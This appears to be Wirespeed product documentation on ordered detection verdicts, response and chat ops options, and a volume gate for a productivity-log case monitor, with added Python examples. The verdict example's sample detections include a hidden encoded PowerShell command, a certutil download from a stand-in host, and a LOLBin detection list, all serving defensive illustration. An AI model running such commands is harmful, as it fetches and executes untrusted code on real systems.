
After Wirespeed receives a detection from one of your integrations, it is categorized and goes through the process of verdicting. Verdicts are a series of enrichments and checks Wirespeed performs on the detection and related data in your environment to determine what actions should be taken. Below are a few examples from the Endpoint > Execution detection verdicts:

[Image: Verdicts]

Verdicts are processed in top-down order: if the first verdict does not match, evaluation continues down the list until a verdict matches or the default verdict is reached. You can customize these verdicts to tune Wirespeed to your environment.

Customizing Verdicts

You can customize Wirespeed’s automatic response options, chat ops, and severities for each verdict.

Response

Contain User

Lock the user account of any users associated with this detection.

Contain Endpoint

Network-isolate any endpoints associated with this detection.

Escalate

Notify your team about the detection for manual investigation.

Correlate & close

Close the detection and allow it to be used as a threat indicator for other cases.

Skip

Ignore this verdict and continue on to the next one. You cannot skip the default rule.

Chat Ops

Reach out to the user(s) affected by this detection and ask them if it was an intentional action by them. Additional options are available to require the user to perform SMS MFA for identity verification, verify with their manager, and enable/disable chat ops for VIP users.

Chat Ops Timeout Verdict

When a user does not respond within the chat ops timeout window you have defined in your team settings, you can declare a verdict to use.

Chat Ops Unsure Verdict

When a user responds they are unsure if they performed the action that caused the detection, you can declare a verdict to use.
For either declared verdict, Malicious results in the user and endpoint being contained, Benign closes the case, and Suspicious escalates to your team.
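The evaluation order, response options and chat ops handling described in this section, written out as a small model so you can see how a detection falls through the list. This is an added example, not Wirespeed's code: the detection field names, the sample verdicts, the sample detections and the "yes/no/unsure/no answer" reply values are all constructed for illustration.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Added example: a minimal model of top-down verdict evaluation as this page describes it.
# Not Wirespeed's code. Detection fields, sample verdicts and sample detections are constructed.

# Response options from the page.
CONTAIN_USER = "contain_user"          # lock associated user accounts
CONTAIN_ENDPOINT = "contain_endpoint"  # network-isolate associated endpoints
ESCALATE = "escalate"                  # notify the team for manual investigation
CORRELATE_CLOSE = "correlate_close"    # close; keep as an indicator for other cases
SKIP = "skip"                          # ignore this verdict and keep evaluating
CHAT_OPS = "chat_ops"                  # ask the user whether the action was intentional

# A chat ops answer, or the declared timeout/unsure verdict, resolves to one of these.
LABEL_ACTIONS: Dict[str, List[str]] = {
    "malicious": [CONTAIN_USER, CONTAIN_ENDPOINT],
    "benign": [CORRELATE_CLOSE],
    "suspicious": [ESCALATE],
}

LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}  # constructed list


@dataclass
class Verdict:
    name: str
    matches: Callable[[dict], bool]
    response: str
    severity: str = "low"
    timeout_verdict: str = "suspicious"  # chat ops: used when the user never answers
    unsure_verdict: str = "suspicious"   # chat ops: used when the user answers "unsure"


@dataclass
class Outcome:
    verdict: str
    actions: List[str]
    severity: str
    trace: List[str] = field(default_factory=list)


def resolve_chat_ops(v: Verdict, reply: Optional[str]) -> List[str]:
    """Map a chat ops reply to actions. reply is 'yes' (the user did it intentionally),
    'no', 'unsure', or None when the timeout window elapsed without an answer."""
    if reply is None:
        label = v.timeout_verdict
    elif reply == "unsure":
        label = v.unsure_verdict
    elif reply == "yes":
        label = "benign"
    elif reply == "no":
        label = "malicious"
    else:
        raise ValueError(f"unexpected chat ops reply: {reply!r}")
    return LABEL_ACTIONS[label]


def evaluate(verdicts: List[Verdict], default: Verdict, detection: dict,
             chat_reply: Optional[str] = None) -> Outcome:
    """Walk the list top down. The first verdict that matches and is not Skip decides;
    a matching Skip verdict is ignored and evaluation continues. If nothing decides,
    the default verdict applies, and the default may not be Skip."""
    if default.response == SKIP:
        raise ValueError("the default verdict cannot be Skip")
    trace: List[str] = []
    for v in verdicts:
        if not v.matches(detection):
            trace.append(f"{v.name}: no match")
            continue
        if v.response == SKIP:
            trace.append(f"{v.name}: matched, Skip -> continue")
            continue
        trace.append(f"{v.name}: matched -> {v.response}")
        actions = resolve_chat_ops(v, chat_reply) if v.response == CHAT_OPS else [v.response]
        return Outcome(v.name, actions, v.severity, trace)
    trace.append(f"{default.name}: default -> {default.response}")
    return Outcome(default.name, [default.response], default.severity, trace)


# Constructed verdicts, in the spirit of an Endpoint > Execution category.
VERDICTS = [
    Verdict("lab_host_noise", lambda d: d["host"].startswith("lab-"), SKIP),
    Verdict("encoded_powershell", lambda d: "-enc" in d["cmdline"].lower(), CONTAIN_ENDPOINT, "high"),
    Verdict("lolbin_from_user_profile",
            lambda d: d["process"] in LOLBINS and d["parent_path"].lower().startswith("c:\\users\\"),
            CHAT_OPS, "medium", timeout_verdict="suspicious", unsure_verdict="malicious"),
    Verdict("admin_installer", lambda d: d["process"] == "msiexec.exe" and d["user"].endswith("-admin"),
            CORRELATE_CLOSE),
]
DEFAULT = Verdict("default", lambda d: True, ESCALATE, "medium")

# Constructed sample detections.
ENCODED_PS_ON_LAB_HOST = {"host": "lab-01", "user": "jdoe", "process": "powershell.exe",
                          "parent_path": "C:\\Windows\\explorer.exe",
                          "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
CERTUTIL_FROM_DOWNLOADS = {"host": "ws-42", "user": "jdoe", "process": "certutil.exe",
                           "parent_path": "C:\\Users\\jdoe\\Downloads\\setup.exe",
                           "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"}
NOTEPAD = {"host": "ws-07", "user": "jdoe", "process": "notepad.exe",
           "parent_path": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe"}

if __name__ == "__main__":
    for det, reply in [(ENCODED_PS_ON_LAB_HOST, None), (CERTUTIL_FROM_DOWNLOADS, None),
                       (CERTUTIL_FROM_DOWNLOADS, "unsure"), (NOTEPAD, None)]:
        o = evaluate(VERDICTS, DEFAULT, det, reply)
        print(f"{det['host']} reply={reply!r}: {o.verdict} -> {o.actions} ({o.severity})")
        for line in o.trace:
            print("   ", line)
```

Two things the trace makes visible: a matching Skip verdict does not end evaluation (the lab host still reaches the encoded PowerShell verdict), and a chat ops verdict's outcome is not fixed until the user's reply, the timeout verdict or the unsure verdict resolves it.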

Case monitors and productivity logs

Case monitors run for some categories (for example Identity Login) and watch for patterns over time using platform data, not only the original detection. The Identity Login monitor depends on productivity logs: mailbox and related collaboration activity that Wirespeed stores as productivity-tagged events. Before running its rules, the monitor checks that your tenant has enough recent volume (at least 250 productivity-tagged events in the last 30 days). If that threshold is not met, the monitor skips so it does not draw conclusions without enough data. That is not a signal that a specific integration is broken; it means productivity log volume in Wirespeed is too low for this monitor to run meaningfully.

Which integrations supply productivity logs?

Productivity-tagged events come from:
Integration | Role
Microsoft (Microsoft 365) | Unified Audit Log (UAL) activity that Wirespeed maps to productivity actions (for example mailbox rules, mail access/send/delete, SharePoint/OneDrive file activity, and certain account-related operations).
Google Workspace | Gmail audit/reporting (message sent and received).
Other integrations do not currently feed this productivity stream. If you rely only on vendors outside that table, you may see the skip message until Microsoft 365 and/or Google Workspace mail and audit data is connected and ingested at sufficient volume.
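The volume gate described above (at least 250 productivity-tagged events in the last 30 days, otherwise the monitor skips) and the integration table, as an added example of how such a check can be implemented and why plentiful data from the wrong source still produces the skip. This is not Wirespeed's code: the event schema, the per-integration counts and the events themselves are constructed, and the exact set of operations Wirespeed tags as productivity is an assumption (the Microsoft names are real Unified Audit Log operation names matching the categories in the table; the Gmail names are placeholders).

```python
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Added example: gating a case monitor on productivity-log volume as this page describes.
# Not Wirespeed's code. Event schema and events are constructed; the operation-to-tag
# mapping is an assumption based on the integration table above.

MIN_EVENTS = 250
WINDOW_DAYS = 30
NOW = datetime(2025, 1, 31, 12, 0, tzinfo=timezone.utc)  # fixed "now" so the demo is reproducible

# Illustrative productivity mapping. The Microsoft entries are real UAL operation names for
# mailbox rules, mail access/send/delete and SharePoint/OneDrive file activity; the Gmail
# entries are placeholders for "message sent/received".
PRODUCTIVITY_OPS = {
    "microsoft365": {"New-InboxRule", "Set-InboxRule", "MailItemsAccessed", "Send",
                     "SoftDelete", "HardDelete", "FileAccessed", "FileDownloaded"},
    "google_workspace": {"gmail.message_sent", "gmail.message_received"},
}


def is_productivity(event: dict) -> bool:
    """True when the event's integration/operation pair carries the productivity tag."""
    return event["operation"] in PRODUCTIVITY_OPS.get(event["integration"], set())


def productivity_volume(events: List[dict], now: datetime, window_days: int = WINDOW_DAYS) -> Counter:
    """Count productivity-tagged events per integration inside the trailing window."""
    cutoff = now - timedelta(days=window_days)
    per_integration: Counter = Counter()
    for e in events:
        if e["ts"] >= cutoff and is_productivity(e):
            per_integration[e["integration"]] += 1
    return per_integration


def monitor_gate(events: List[dict], now: datetime, min_events: int = MIN_EVENTS) -> Dict:
    """Decide whether the monitor may run, with a reason a responder can act on."""
    vol = productivity_volume(events, now)
    total = sum(vol.values())
    if total < min_events:
        reason = (f"skipping: {total} productivity-tagged events in the last {WINDOW_DAYS} days, "
                  f"need {min_events}; this is low volume, not a broken integration")
        return {"run": False, "total": total, "by_integration": dict(vol), "reason": reason}
    return {"run": True, "total": total, "by_integration": dict(vol), "reason": "threshold met"}


def constructed_events(recent_m365: int, stale_m365: int, recent_gmail: int, other_vendor: int) -> List[dict]:
    """Constructed event set: recent and stale Microsoft 365 mail/file ops, Gmail mail events,
    and events from a vendor that does not feed the productivity stream."""
    events = []
    m365_ops = ["MailItemsAccessed", "Send", "FileAccessed", "New-InboxRule"]
    for i in range(recent_m365):
        events.append({"integration": "microsoft365", "operation": m365_ops[i % 4],
                       "ts": NOW - timedelta(hours=i)})                  # inside the window
    for i in range(stale_m365):
        events.append({"integration": "microsoft365", "operation": "Send",
                       "ts": NOW - timedelta(days=WINDOW_DAYS + 1 + i)})  # outside the window
    for i in range(recent_gmail):
        events.append({"integration": "google_workspace", "operation": "gmail.message_sent",
                       "ts": NOW - timedelta(minutes=i)})
    for i in range(other_vendor):
        events.append({"integration": "edr_vendor", "operation": "ProcessCreate",
                       "ts": NOW - timedelta(minutes=i)})                # plentiful but untagged
    return events


def gate_for(recent_m365: int, stale_m365: int, recent_gmail: int, other_vendor: int) -> Dict:
    """Run the gate over a constructed event set built with the given counts."""
    return monitor_gate(constructed_events(recent_m365, stale_m365, recent_gmail, other_vendor), NOW)


if __name__ == "__main__":
    for args in [(200, 100, 30, 500), (200, 100, 50, 0)]:
        r = gate_for(*args)
        print(args, "->", "run" if r["run"] else "skip", r["by_integration"], "|", r["reason"])
```

In the first run, 500 EDR events and 100 stale mail events contribute nothing, so 230 tagged events fall short and the monitor skips even though the tenant is clearly ingesting data; adding 20 recent Gmail events crosses the threshold. When you see the skip message, counting tagged events per integration inside the window, as the gate's output does here, tells you which source needs to be connected or is under-delivering.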